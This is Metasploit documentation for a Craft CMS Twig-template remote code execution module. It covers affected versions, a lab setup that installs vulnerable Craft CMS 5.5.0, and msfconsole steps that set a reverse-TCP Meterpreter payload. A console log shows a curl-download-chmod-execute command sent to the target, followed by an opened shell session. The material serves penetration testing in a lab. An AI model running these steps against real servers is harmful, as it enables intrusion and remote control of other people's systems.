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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/http/
Views: 16005

Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in Craft CMS.

The vulnerability lies in improper handling of Twig templates, which can be exploited to inject and execute arbitrary PHP code on the server via crafted HTTP requests.

Affected Versions

  • 5.x Series: >= 5.0.0-RC1, < 5.5.2

  • 4.x Series: >= 4.0.0-RC1, < 4.13.2

  • 3.x Series: >= 3.0.0, < 3.9.14

Setting Up a Vulnerable Lab

To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.

Docker Setup

Install a specific vulnerable version of Craft CMS:

mkdir exploit-craft && \ cd exploit-craft && \ # Configure DDEV ( project for Craft CMS \ ddev config \ --project-type=craftcms \ --docroot=web \ --create-docroot \ --php-version="8.2" \ --database="mysql:8.0" \ --nodejs-version="20" && \ # Create the DDEV project ddev start -y && \ # Create Craft CMS with the specified version ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \ # Install a vulnerable Craft CMS version ddev composer require "craftcms/cms:5.5.0" \ --no-scripts \ --no-interaction --with-all-dependencies && \ # Set the security key for Craft CMS ddev craft setup/security-key && \ # Install Craft CMS ddev craft install/craft \ --username=admin \ --password=password123 \ \ --site-name=Testsite \ --language=en \ --site-url='$DDEV_PRIMARY_URL' && \ # Enable register_argc_argv for PHP mkdir -p .ddev/php/ && \ echo "register_argc_argv = On" > .ddev/php/php.ini && \ ddev restart && \ # Launch the project echo 'Setup complete. Launching the project.' && \ ddev launch

Verification Steps

  1. Start the vulnerable Craft CMS instance using the steps above.

  2. Launch msfconsole.

  3. Use the module: use exploit/linux/http/craftcms_ftp_template.

  4. Set RHOSTS to the target Craft CMS instance.

  5. Configure additional options (TARGETURI, SSL, etc.) as needed.

  6. Execute the exploit with the run command.

  7. If successful, the module will execute the payload on the target.


No option


Successful Exploitation Against Craft CMS 5.5.0


  • Local Craft CMS instance with a vulnerable version (e.g., 5.5.0).

  • Metasploit Framework.


To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:

  1. Start msfconsole:

  1. Load the module:

use exploit/linux/http/craftcms_ftp_template
  1. Set the RHOSTS option to the target Craft CMS instance, for example:

  1. Configure other necessary options such as TARGETURI, SSL, and RPORT if required. By default:

    • RPORT is set to 80.

    • TARGETURI is set to /.

  2. Set the payload for exploitation. For example:

set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  1. Set the local listener address and port:

set LHOST set LPORT 4444
  1. Optionally, customize FTP-related settings like SRVPORT and FETCH_URIPATH if needed:

set SRVPORT 9090 set FETCH_SRVPORT 8081 set FETCH_URIPATH /custom_payload_path
  1. Run the exploit:


Expected Results:

If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:

msf6 exploit(linux/http/craftcms_ftp_template) > options Module options (exploit/linux/http/craftcms_ftp_template): Name Current Setting Required Description ---- --------------- -------- ----------- PASVPORT 0 no The local PASV data port to listen on (0 is random) Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see oit.html RPORT 80 yes The target port (TCP) SRVHOST yes The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses. SRVPORT 9090 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) VHOST no HTTP server virtual host Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILENAME QnXFYebbb no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8081 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Unix/Linux Command Shell View the full module info with the info, or info -d command. msf6 exploit(linux/http/craftcms_ftp_template) > exploit [*] Command to run on remote host: curl -so ./jlVAsfWu;chmod +x ./jlVAsfWu;./jlVAsfWu& [*] Exploit running as background job 57. [*] Exploit completed, but no session was created. msf6 exploit(linux/http/craftcms_ftp_template) > [*] Fetch handler listening on [*] HTTP server started [*] Adding resource /LoPlnjEpeOexZNVppn6cAA [*] Started reverse TCP handler on [*] Running automatic check ("set AutoCheck false" to disable) [*] Performing vulnerability check... [+] The target is vulnerable. [*] Starting FTP service... [*] Started service listener on [*] FTP server started on [*] Sending HTTP request to trigger the payload... [*] Triggering HTTP request... [*] -> 220 FTP Server Ready [*] on_client_command_user [*] -> 331 Username ok, send password. [*] on_client_command_pass [*] -> 230 Login successful. [*] on_client_command_cwd [*] -> 250 "/default" is current directory. [*] on_client_command_type [*] -> 200 Type set to: Binary. [*] on_client_command_size [*] -> 550 /default is not retrievable. [*] on_client_command_mdtm [*] -> 550 /default is not retrievable. [*] -> 220 FTP Server Ready [*] on_client_command_user [*] -> 331 Username ok, send password. [*] on_client_command_pass [*] -> 230 Login successful. [*] on_client_command_cwd [*] -> 550 Not a directory [*] on_client_command_type [*] -> 200 Type set to: Binary. [*] on_client_command_size [*] -> 213 154 [*] on_client_command_mdtm [*] -> 213 20250110170738 [*] -> 220 FTP Server Ready [*] on_client_command_user [*] -> 331 Username ok, send password. [*] on_client_command_pass [*] -> 230 Login successful. [*] on_client_command_cwd [*] -> 550 Not a directory [*] on_client_command_type [*] -> 200 Type set to: Binary. [*] on_client_command_size [*] -> 213 154 [*] on_client_command_mdtm [*] -> 213 20250110170738 [*] -> 220 FTP Server Ready [*] on_client_command_user [*] -> 331 Username ok, send password. [*] on_client_command_pass [*] -> 230 Login successful. [*] on_client_command_type [*] -> 200 Type set to: Binary. [*] on_client_command_size [*] -> 213 154 [*] on_client_command_epsv [*] -> 502 EPSV command not implemented. [*] on_client_command_retr [*] -> 150 Opening data connection for /default/index.twig [*] -> 226 Transfer complete. [*] on_client_command_quit [*] -> 221 Goodbye. [*] Client requested /LoPlnjEpeOexZNVppn6cAA [*] Sending payload to (curl/7.88.1) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3045380 bytes) to [*] Meterpreter session 14 opened ( -> at 2025-01-10 17:07:39 +0100 msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14 [*] Starting interaction with 14... meterpreter > sysinfo Computer : OS : Debian 12.8 (Linux 5.15.0-130-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > [*] Waiting for FTP client connections... [*] Shutting down FTP service... [*] Server stopped.